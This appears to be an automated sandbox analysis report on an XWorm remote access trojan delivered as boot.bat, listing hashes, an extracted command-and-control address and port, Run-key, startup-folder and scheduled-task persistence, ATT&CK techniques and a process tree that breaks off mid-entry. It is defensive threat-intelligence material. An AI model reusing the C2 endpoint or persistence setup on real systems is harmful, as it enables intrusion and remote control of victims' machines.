xworm | f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd

Analysis

max time kernel
150s
max time network
150s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06/07/2024, 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

boot.bat
Size

410KB
MD5

d87efb4cf8da07e1956944f23313bb5b
SHA1

929203873eaf41e02377a26e1ef4db8a88d37696
SHA256

f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd
SHA512

d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a
SSDEEP

12288:xpWbCqT4gUVKkPSmSZ+XPk6V4mzYWQvKMbGt:xkGqTjURpXPkAUvvKMit

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

case-shield.gl.at.ply.gg:26501

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1060-168-0x000001ACF5590000-0x000001ACF55AA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	1060	powershell.exe
6	1060	powershell.exe
16	1060	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2120	powershell.exe
4836	powershell.exe
1060	powershell.exe
2304	powershell.exe
3036	powershell.exe
5108	powershell.exe
3164	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
216	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\system	svchost.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 36 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000006d1a81e48986da017401ee7c72cfda017401ee7c72cfda0114000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616209"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2272	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3352	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1776	taskmgr.exe
1776	taskmgr.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe
1776	taskmgr.exe
2304	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe
1776	taskmgr.exe
1776	taskmgr.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3352	Explorer.EXE
1776	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeIncreaseQuotaPrivilege	4836	powershell.exe
Token: SeSecurityPrivilege	4836	powershell.exe
Token: SeTakeOwnershipPrivilege	4836	powershell.exe
Token: SeLoadDriverPrivilege	4836	powershell.exe
Token: SeSystemProfilePrivilege	4836	powershell.exe
Token: SeSystemtimePrivilege	4836	powershell.exe
Token: SeProfSingleProcessPrivilege	4836	powershell.exe
Token: SeIncBasePriorityPrivilege	4836	powershell.exe
Token: SeCreatePagefilePrivilege	4836	powershell.exe
Token: SeBackupPrivilege	4836	powershell.exe
Token: SeRestorePrivilege	4836	powershell.exe
Token: SeShutdownPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeSystemEnvironmentPrivilege	4836	powershell.exe
Token: SeRemoteShutdownPrivilege	4836	powershell.exe
Token: SeUndockPrivilege	4836	powershell.exe
Token: SeManageVolumePrivilege	4836	powershell.exe
Token: 33	4836	powershell.exe
Token: 34	4836	powershell.exe
Token: 35	4836	powershell.exe
Token: 36	4836	powershell.exe
Token: SeIncreaseQuotaPrivilege	4836	powershell.exe
Token: SeSecurityPrivilege	4836	powershell.exe
Token: SeTakeOwnershipPrivilege	4836	powershell.exe
Token: SeLoadDriverPrivilege	4836	powershell.exe
Token: SeSystemProfilePrivilege	4836	powershell.exe
Token: SeSystemtimePrivilege	4836	powershell.exe
Token: SeProfSingleProcessPrivilege	4836	powershell.exe
Token: SeIncBasePriorityPrivilege	4836	powershell.exe
Token: SeCreatePagefilePrivilege	4836	powershell.exe
Token: SeBackupPrivilege	4836	powershell.exe
Token: SeRestorePrivilege	4836	powershell.exe
Token: SeShutdownPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeSystemEnvironmentPrivilege	4836	powershell.exe
Token: SeRemoteShutdownPrivilege	4836	powershell.exe
Token: SeUndockPrivilege	4836	powershell.exe
Token: SeManageVolumePrivilege	4836	powershell.exe
Token: 33	4836	powershell.exe
Token: 34	4836	powershell.exe
Token: 35	4836	powershell.exe
Token: 36	4836	powershell.exe
Token: SeIncreaseQuotaPrivilege	4836	powershell.exe
Token: SeSecurityPrivilege	4836	powershell.exe
Token: SeTakeOwnershipPrivilege	4836	powershell.exe
Token: SeLoadDriverPrivilege	4836	powershell.exe
Token: SeSystemProfilePrivilege	4836	powershell.exe
Token: SeSystemtimePrivilege	4836	powershell.exe
Token: SeProfSingleProcessPrivilege	4836	powershell.exe
Token: SeIncBasePriorityPrivilege	4836	powershell.exe
Token: SeCreatePagefilePrivilege	4836	powershell.exe
Token: SeBackupPrivilege	4836	powershell.exe
Token: SeRestorePrivilege	4836	powershell.exe
Token: SeShutdownPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeSystemEnvironmentPrivilege	4836	powershell.exe
Token: SeRemoteShutdownPrivilege	4836	powershell.exe
Token: SeUndockPrivilege	4836	powershell.exe
Token: SeManageVolumePrivilege	4836	powershell.exe
Token: 33	4836	powershell.exe
Token: 34	4836	powershell.exe
Token: 35	4836	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
3352	Explorer.EXE
1776	taskmgr.exe
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
3352	Explorer.EXE
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe
1776	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1060	powershell.exe
3352	Explorer.EXE
3352	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3296 wrote to memory of 3652	3296	cmd.exe	76
PID 3296 wrote to memory of 3652	3296	cmd.exe	76
PID 3296 wrote to memory of 2120	3296	cmd.exe	77
PID 3296 wrote to memory of 2120	3296	cmd.exe	77
PID 2120 wrote to memory of 4836	2120	powershell.exe	78
PID 2120 wrote to memory of 4836	2120	powershell.exe	78
PID 2120 wrote to memory of 4404	2120	powershell.exe	81
PID 2120 wrote to memory of 4404	2120	powershell.exe	81
PID 4404 wrote to memory of 2260	4404	WScript.exe	82
PID 4404 wrote to memory of 2260	4404	WScript.exe	82
PID 2260 wrote to memory of 3124	2260	cmd.exe	84
PID 2260 wrote to memory of 3124	2260	cmd.exe	84
PID 2260 wrote to memory of 1060	2260	cmd.exe	85
PID 2260 wrote to memory of 1060	2260	cmd.exe	85
PID 1060 wrote to memory of 3352	1060	powershell.exe	55
PID 1060 wrote to memory of 984	1060	powershell.exe	14
PID 1060 wrote to memory of 1764	1060	powershell.exe	35
PID 1060 wrote to memory of 3536	1060	powershell.exe	64
PID 1060 wrote to memory of 1756	1060	powershell.exe	34
PID 1060 wrote to memory of 376	1060	powershell.exe	17
PID 1060 wrote to memory of 1556	1060	powershell.exe	31
PID 1060 wrote to memory of 4500	1060	powershell.exe	63
PID 1060 wrote to memory of 1148	1060	powershell.exe	22
PID 1060 wrote to memory of 2524	1060	powershell.exe	44
PID 1060 wrote to memory of 1340	1060	powershell.exe	26
PID 1060 wrote to memory of 2516	1060	powershell.exe	43
PID 1060 wrote to memory of 344	1060	powershell.exe	16
PID 1060 wrote to memory of 2508	1060	powershell.exe	42
PID 1060 wrote to memory of 2704	1060	powershell.exe	47
PID 1060 wrote to memory of 720	1060	powershell.exe	8
PID 1060 wrote to memory of 2096	1060	powershell.exe	40
PID 1060 wrote to memory of 1700	1060	powershell.exe	33
PID 1060 wrote to memory of 1208	1060	powershell.exe	23
PID 1060 wrote to memory of 1500	1060	powershell.exe	30
PID 1060 wrote to memory of 908	1060	powershell.exe	13
PID 1060 wrote to memory of 1096	1060	powershell.exe	21
PID 1060 wrote to memory of 3656	1060	powershell.exe	66
PID 1060 wrote to memory of 2668	1060	powershell.exe	45
PID 1060 wrote to memory of 1484	1060	powershell.exe	29
PID 1060 wrote to memory of 3068	1060	powershell.exe	53
PID 1060 wrote to memory of 1692	1060	powershell.exe	39
PID 1060 wrote to memory of 1076	1060	powershell.exe	20
PID 1060 wrote to memory of 2252	1060	powershell.exe	41
PID 1060 wrote to memory of 1244	1060	powershell.exe	25
PID 1060 wrote to memory of 1852	1060	powershell.exe	37
PID 1060 wrote to memory of 2716	1060	powershell.exe	48
PID 1060 wrote to memory of 1448	1060	powershell.exe	28
PID 1060 wrote to memory of 1644	1060	powershell.exe	32
PID 1060 wrote to memory of 848	1060	powershell.exe	12
PID 1060 wrote to memory of 1828	1060	powershell.exe	36
PID 1060 wrote to memory of 1236	1060	powershell.exe	24
PID 1060 wrote to memory of 1028	1060	powershell.exe	19
PID 1060 wrote to memory of 2796	1060	powershell.exe	51
PID 1060 wrote to memory of 4668	1060	powershell.exe	61
PID 1060 wrote to memory of 616	1060	powershell.exe	18
PID 1060 wrote to memory of 2780	1060	powershell.exe	50
PID 1060 wrote to memory of 1400	1060	powershell.exe	27
PID 1060 wrote to memory of 804	1060	powershell.exe	11
PID 804 wrote to memory of 5016	804	svchost.exe	87
PID 804 wrote to memory of 5016	804	svchost.exe	87
PID 3352 wrote to memory of 1776	3352	Explorer.EXE	88
PID 3352 wrote to memory of 1776	3352	Explorer.EXE	88
PID 1060 wrote to memory of 1776	1060	powershell.exe	88
PID 1060 wrote to memory of 2304	1060	powershell.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
- Suspicious use of WriteProcessMemory
PID:804
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:5016
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:68
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  2⤵
  PID:3384
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:4428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:984

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1096
- C:\Users\Admin\system.exe
  C:\Users\Admin\system.exe
  2⤵
  - Executes dropped EXE
  PID:216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1764

c:\windows\system32\svchost.exe
